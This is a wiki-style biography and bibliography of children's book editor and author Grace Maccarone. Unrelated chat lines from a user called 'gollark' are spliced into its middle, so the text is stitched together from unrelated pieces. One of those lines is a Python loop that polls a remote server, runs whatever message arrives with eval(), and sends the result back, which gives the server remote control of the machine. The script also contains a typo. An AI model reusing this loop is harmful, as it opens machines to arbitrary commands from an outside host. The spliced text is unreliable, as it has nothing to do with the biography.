Grace Maccarone
Grace Maccarone is a children’s book editor and author, notably of Miss Lina’s Ballerinas, illustrated by Christine Davenier,[1] and its sequel Miss Lina’s Ballerinas and the Prince.[2] She has also worked as an editor at Scholastic,[3] Wireless Generation,[4] and currently Holiday House.[5]
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Genre | Children's literature |
Notable works | Miss Lina’s Ballerinas |
Partial bibliography
- The Haunting of Grade Three, illustrated by Kelly Oechsli, Scholastic, 1987
- Itchy, Itchy Chicken Pox, illustrated by Betsy Lewin, Cartwheel, 1992
- The Sword in the Stone, illustrated by Joe Boddy, Scholastic, 1992
- Oink! Moo! How Do You Do?, illustrated by Hans Wilhelm, Cartwheel, 1994
- Pizza Party, illustrated by Emily Arnold McCully, Scholastic, 1994
- Soccer Game!, by Meredith Johnson, Cartwheel, 1994
- The Classroom Pet, Scholastic, 1995
- My Tooth Is About to Fall Out, illustrated by Betsy Lewin, Cartwheel, 1995
- The First Grade Friends: Lunch Box Surprise, illustrated by Betsy Lewin, Cartwheel, 1995
- Monster Math, illustrated by Marge Hartelius, Scholastic, 1995
- First Grade Friends: Recess Mess, illustrated by Betsy Lewin, Scholastic, 1996
- Monster Math School Time, illustrated by Marge Hartelius, Scholastic, 1997
- Monster Money, with Marilyn Burns, Cartwheel, 1998
- Monster Math Picnic, Cartwheel, 1998
- Three Pigs, One Wolf, Seven Magic Shapes, illustrated by David Neuhaus, with math activities by Marilyn Burns, Cartwheel, 1998
- What Is That? Said the Cat, illustrated by Jeffrey Scherer, Cartwheel, 1998
- A Child Was Born: A First Nativity Book, illustrated by Sam Williams, Scholastic, 2000
- Dinosaurs, illustrated by Richard Courtney, Scholastic, 2001
- A Child’s Goodnight Prayer, illustrated by Sam Williams, Cartwheel, 2001
- Miss Lina’s Ballerinas, illustrated by Christine Davenier, Feiwel & Friends, 2010
- Miss Lina’s Ballerinas and the Prince, illustrated by Christine Davenier, Feiwel & Friends, 2011
- Miss Lina’s Ballerinas and the Wicked Wish, illustrated by Christine Davenier, Feiwel & Friends, 2012
- Princess Tales: Once Upon a Time in Rhyme with Seek-and-Find Pictures, illustrated by Gail de Marcken, Feiwel & Friends, 2013
- A Day with Miss Lina's Ballerinas, illustrated by Christine Davenier, Square Fish, 2014
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gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: try: send(repr(eval(data["result"]["data"]))) except Exception as e: end(repr(e))```Here is a small version if you want that.
gollark: However, imagine disutilization of internet protocol version 6.
gollark: 0.0.0.0?
gollark: They proved themselves a formidable adversary last time.
References
- “Miss Lina’s Ballerinas”, Kirkus Reviews, August 31, 2010.
- “’Miss Lina's Ballerinas and the Prince' by Grace Maccarone”, Mary Harris Russell, The Chicago Tribune.
- “Q&A/Diana White; Ballerina's Ballerina Now Inspires Others”, Donna Greene, The New York Times, February 7, 1999.
- Grace Maccarone LinkedIn
- Children's Books: The Art of Mentoring
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